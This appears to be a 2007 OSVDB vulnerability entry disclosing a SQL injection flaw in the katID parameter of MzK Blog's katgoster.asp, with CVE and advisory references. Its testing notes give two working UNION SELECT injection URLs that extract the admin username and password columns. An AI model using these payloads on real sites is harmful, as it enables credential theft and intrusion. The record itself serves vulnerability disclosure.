MzK Blog katgoster.asp katID Variable SQL Injection

2007-07-16T18:06:00
ID OSVDB:36257
Type osvdb
Reporter GeFORC3()
Modified 2007-07-16T18:06:00

Description

Manual Testing Notes

http://site.com/script_path/katgoster.asp?katID=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

http://site.com/script_path/katgoster.asp?katID=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

References:

Secunia Advisory ID:26070 Other Advisory URL: http://www.packetstormsecurity.org/0707-exploits/mzkblog-sql.txt ISS X-Force ID: 35424 FrSIRT Advisory: ADV-2007-2542 CVE-2007-3824 Bugtraq ID: 24909